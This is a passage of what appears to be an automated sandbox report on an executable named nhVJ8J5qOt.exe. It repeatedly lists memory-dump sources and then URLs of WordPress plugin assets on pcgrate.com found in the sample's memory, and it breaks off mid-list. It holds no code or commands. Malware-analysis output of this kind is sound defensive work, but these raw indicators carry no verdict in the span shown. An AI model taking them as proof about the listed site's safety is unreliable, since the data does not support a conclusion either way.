00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/css/somdn-style.css?ve
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/js/somdn_script.js?ver
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/dt-the7-core/assets/css/post-type.min.css?ver=2.5.7.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.3.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.3.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.3.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.3.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.3.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.3
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:u
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 